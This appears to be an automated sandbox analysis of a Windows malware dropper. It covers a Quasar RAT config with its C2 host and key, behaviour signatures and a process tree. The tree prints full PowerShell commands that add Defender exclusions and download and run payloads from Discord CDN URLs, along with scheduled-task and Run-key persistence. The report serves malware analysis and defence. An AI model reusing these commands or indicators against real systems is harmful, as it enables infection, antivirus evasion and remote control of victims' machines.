Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    30-10-2021 08:42

General

  • Target

    d7bda4ea100c3b9b58d9a9095628c064.exe

  • Size

    72KB

  • MD5

    d7bda4ea100c3b9b58d9a9095628c064

  • SHA1

    70cb92dfc7e0dd76d7db1ee2877d87be8be8b638

  • SHA256

    1aec33c9dc704ad71932eee6e128c9eb0908cab49d85f5a0f788484777a68a57

  • SHA512

    56b0b05499881cd07aa9efb640d89b1debe2ac3e5378057b350f91d039056799859b53ad330e83af7f79d223bb234df2e1b32a40b3becc7c295049704606f424

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip

Extracted

Family

quasar

Version

1.4.0

Botnet

Anubisv2

C2

yoworldservices.space:1338

Mutex

48e1f30b-026f-45d4-b8f7-2bd40381b7db

Attributes
  • encryption_key

    0411D8B9B23547F86733347B0634010F112E158F

  • install_name

    dlscord.exe

  • log_directory

    dlscordLogs

  • reconnect_delay

    3000

  • startup_key

    dlscord

  • subdirectory

    dlscord

Signatures

  • HiveRAT

    HiveRAT is an improved version of FirebirdRAT with various capabilities.

  • Quasar Payload 12 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • HiveRAT Payload 2 IoCs
  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 14 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 3 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs ping.exe 1 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d7bda4ea100c3b9b58d9a9095628c064.exe
    "C:\Users\Admin\AppData\Local\Temp\d7bda4ea100c3b9b58d9a9095628c064.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2800
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1460
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip', (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip'))" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip')" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2828
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3152
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3368
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3572
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:920
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2152
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3832
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip', (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1044
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')"
        3⤵
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1780
        • C:\Windows\SysWOW64\regedit.exe
          "regedit.exe" "C:\Users\Admin\AppData\Local\Temp\Cert.reg"
          4⤵
          • Adds Run key to start application
          • Runs .reg file with regedit
          PID:2928
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1772
        • C:\Users\Admin\AppData\Roaming\hivee.exe
          "C:\Users\Admin\AppData\Roaming\hivee.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2320
          • C:\Users\Admin\AppData\Roaming\hivee.exe
            "C:\Users\Admin\AppData\Roaming\hivee.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:364
            • C:\Windows\SysWOW64\explorer.exe
              "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs
              6⤵
                PID:1712
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2264
          • C:\Users\Admin\AppData\Roaming\BITBACKK.exe
            "C:\Users\Admin\AppData\Roaming\BITBACKK.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1020
            • C:\Users\Admin\AppData\Local\Temp\tbPLVy.exe
              C:\Users\Admin\AppData\Local\Temp\tbPLVy.exe
              5⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              PID:3136
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\56b759b8.bat" "
                6⤵
                  PID:1772
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2860
            • C:\Users\Admin\AppData\Roaming\dlscord.exe
              "C:\Users\Admin\AppData\Roaming\dlscord.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1780
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord.exe" /rl HIGHEST /f
                5⤵
                • Creates scheduled task(s)
                PID:760
              • C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
                "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:600
                • C:\Windows\SYSTEM32\schtasks.exe
                  "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
                  6⤵
                  • Creates scheduled task(s)
                  PID:3688
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tMa0YDtHoEj0.bat" "
                  6⤵
                    PID:428
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      7⤵
                        PID:4040
                      • C:\Windows\system32\PING.EXE
                        ping -n 10 localhost
                        7⤵
                        • Runs ping.exe
                        PID:1028
                      • C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
                        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1104
                        • C:\Windows\SYSTEM32\schtasks.exe
                          "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
                          8⤵
                          • Creates scheduled task(s)
                          PID:1256
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QRGv00BqgBxJ.bat" "
                          8⤵
                            PID:1084
                            • C:\Windows\system32\chcp.com
                              chcp 65001
                              9⤵
                                PID:1980
                              • C:\Windows\system32\PING.EXE
                                ping -n 10 localhost
                                9⤵
                                • Runs ping.exe
                                PID:1220
                              • C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
                                "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
                                9⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2412
                                • C:\Windows\SYSTEM32\schtasks.exe
                                  "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
                                  10⤵
                                  • Creates scheduled task(s)
                                  PID:3668
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\i86bos2Gsg9R.bat" "
                                  10⤵
                                    PID:3004
                                    • C:\Windows\system32\chcp.com
                                      chcp 65001
                                      11⤵
                                        PID:2452
                                      • C:\Windows\system32\PING.EXE
                                        ping -n 10 localhost
                                        11⤵
                                        • Runs ping.exe
                                        PID:3192
                                      • C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
                                        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
                                        11⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3708
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
                                          12⤵
                                          • Creates scheduled task(s)
                                          PID:3264
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MMawzvNotngS.bat" "
                                          12⤵
                                            PID:1028
                                            • C:\Windows\system32\chcp.com
                                              chcp 65001
                                              13⤵
                                                PID:3396
                                              • C:\Windows\system32\PING.EXE
                                                ping -n 10 localhost
                                                13⤵
                                                • Runs ping.exe
                                                PID:1576
                                              • C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
                                                "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
                                                13⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2404
                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                  "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
                                                  14⤵
                                                  • Creates scheduled task(s)
                                                  PID:1468
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dlCIspZtap9Z.bat" "
                                                  14⤵
                                                    PID:2724
                                                    • C:\Windows\system32\chcp.com
                                                      chcp 65001
                                                      15⤵
                                                        PID:2132
                                                      • C:\Windows\system32\PING.EXE
                                                        ping -n 10 localhost
                                                        15⤵
                                                        • Runs ping.exe
                                                        PID:1940
                                                      • C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
                                                        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
                                                        15⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3592
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
                                                          16⤵
                                                          • Creates scheduled task(s)
                                                          PID:3188
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OxfbGIHB6kwt.bat" "
                                                          16⤵
                                                            PID:3240
                                                            • C:\Windows\system32\chcp.com
                                                              chcp 65001
                                                              17⤵
                                                                PID:968
                                                              • C:\Windows\system32\PING.EXE
                                                                ping -n 10 localhost
                                                                17⤵
                                                                • Runs ping.exe
                                                                PID:3304
                                                              • C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
                                                                "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
                                                                17⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3896
                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                  "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
                                                                  18⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:3288
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Pa5HvcqTQcGP.bat" "
                                                                  18⤵
                                                                    PID:2068
                                                                    • C:\Windows\system32\chcp.com
                                                                      chcp 65001
                                                                      19⤵
                                                                        PID:3368
                                                                      • C:\Windows\system32\PING.EXE
                                                                        ping -n 10 localhost
                                                                        19⤵
                                                                        • Runs ping.exe
                                                                        PID:2600
                                                                      • C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
                                                                        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
                                                                        19⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3312
                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                          "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
                                                                          20⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:3184
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\H8ndRKEnTzpM.bat" "
                                                                          20⤵
                                                                            PID:700
                                                                            • C:\Windows\system32\chcp.com
                                                                              chcp 65001
                                                                              21⤵
                                                                                PID:2464
                                                                              • C:\Windows\system32\PING.EXE
                                                                                ping -n 10 localhost
                                                                                21⤵
                                                                                • Runs ping.exe
                                                                                PID:3940
                                                                              • C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
                                                                                "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
                                                                                21⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1468
                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                  "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
                                                                                  22⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:3052
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Nqjv1ZSOCGtc.bat" "
                                                                                  22⤵
                                                                                    PID:2216
                                                                                    • C:\Windows\system32\chcp.com
                                                                                      chcp 65001
                                                                                      23⤵
                                                                                        PID:2208
                                                                                      • C:\Windows\system32\PING.EXE
                                                                                        ping -n 10 localhost
                                                                                        23⤵
                                                                                        • Runs ping.exe
                                                                                        PID:2964
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip')"
                                                3⤵
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2032
                                          • C:\Windows\explorer.exe
                                            C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                            1⤵
                                            • Modifies registry class
                                            • Suspicious use of WriteProcessMemory
                                            PID:2156
                                            • C:\Windows\System32\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"
                                              2⤵
                                              • Adds Run key to start application
                                              PID:3204
                                          • C:\Windows\System32\rundll32.exe
                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                            1⤵
                                              PID:1472

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • memory/364-917-0x0000000000400000-0x0000000000454000-memory.dmp

                                              Filesize

                                              336KB

                                            • memory/364-918-0x0000000005440000-0x0000000005441000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/600-1010-0x000000001B170000-0x000000001B172000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/920-696-0x0000000000CF2000-0x0000000000CF3000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/920-724-0x0000000000CF3000-0x0000000000CF4000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/920-694-0x0000000000CF0000-0x0000000000CF1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1044-801-0x0000000000CA3000-0x0000000000CA4000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1044-783-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1044-785-0x0000000000CA2000-0x0000000000CA3000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1104-1023-0x00000000014D0000-0x00000000014D2000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1460-130-0x00000000070C2000-0x00000000070C3000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-156-0x0000000008A90000-0x0000000008A91000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-153-0x0000000009CC0000-0x0000000009CC1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-133-0x0000000007E20000-0x0000000007E21000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-127-0x00000000070C0000-0x00000000070C1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-316-0x00000000070C4000-0x00000000070C6000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1460-137-0x00000000080E0000-0x00000000080E1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-131-0x00000000075B0000-0x00000000075B1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-123-0x0000000006F80000-0x0000000006F81000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-119-0x0000000004E10000-0x0000000004E11000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-145-0x0000000004E10000-0x0000000004E11000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-175-0x000000000A840000-0x000000000A841000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-181-0x00000000099D0000-0x00000000099D1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-139-0x00000000072B0000-0x00000000072B1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-121-0x0000000004E10000-0x0000000004E11000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1460-315-0x00000000070C3000-0x00000000070C4000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1468-1107-0x0000000001300000-0x0000000001302000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1772-896-0x0000000006DA3000-0x0000000006DA4000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1772-847-0x0000000006DA2000-0x0000000006DA3000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1772-846-0x0000000006DA0000-0x0000000006DA1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1780-987-0x000000001B210000-0x000000001B212000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1780-845-0x00000000070B3000-0x00000000070B4000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1780-815-0x00000000070B0000-0x00000000070B1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1780-816-0x00000000070B2000-0x00000000070B3000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2032-986-0x0000000001052000-0x0000000001053000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2032-985-0x0000000001050000-0x0000000001051000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2032-1009-0x0000000001053000-0x0000000001054000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2152-755-0x00000000068B3000-0x00000000068B4000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2152-725-0x00000000068B0000-0x00000000068B1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2152-726-0x00000000068B2000-0x00000000068B3000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2264-898-0x0000000000E00000-0x0000000000E01000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2264-939-0x0000000000E03000-0x0000000000E04000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2264-900-0x0000000000E02000-0x0000000000E03000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2320-903-0x0000000005050000-0x00000000050EC000-memory.dmp

                                              Filesize

                                              624KB

                                            • memory/2404-1061-0x0000000000DD0000-0x0000000000DD2000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2412-1037-0x000000001B590000-0x000000001B592000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2860-953-0x0000000001122000-0x0000000001123000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2860-952-0x0000000001120000-0x0000000001121000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2860-984-0x0000000001123000-0x0000000001124000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-183-0x00000000095A0000-0x00000000095A1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-172-0x000000007EF20000-0x000000007EF21000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-125-0x0000000007260000-0x0000000007261000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-135-0x0000000007970000-0x0000000007971000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-180-0x00000000091D0000-0x00000000091D1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-128-0x00000000048B0000-0x00000000048B1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-122-0x0000000000D40000-0x0000000000D41000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-141-0x0000000008050000-0x0000000008051000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-146-0x0000000000D40000-0x0000000000D41000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-158-0x0000000009020000-0x0000000009053000-memory.dmp

                                              Filesize

                                              204KB

                                            • memory/3152-143-0x0000000008220000-0x0000000008221000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-165-0x0000000009000000-0x0000000009001000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-120-0x0000000000D40000-0x0000000000D41000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-182-0x00000000048B3000-0x00000000048B4000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3152-129-0x00000000048B2000-0x00000000048B3000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3312-1097-0x0000000000F10000-0x0000000000F12000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3368-441-0x0000000001053000-0x0000000001054000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3368-440-0x000000007F2C0000-0x000000007F2C1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3368-409-0x0000000001052000-0x0000000001053000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3368-408-0x0000000001050000-0x0000000001051000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3572-693-0x0000000001113000-0x0000000001114000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3572-659-0x0000000001110000-0x0000000001111000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3572-660-0x0000000001112000-0x0000000001113000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3592-1073-0x0000000002E10000-0x0000000002E12000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3708-1049-0x0000000001140000-0x0000000001142000-memory.dmp

                                              Filesize

                                              8KB

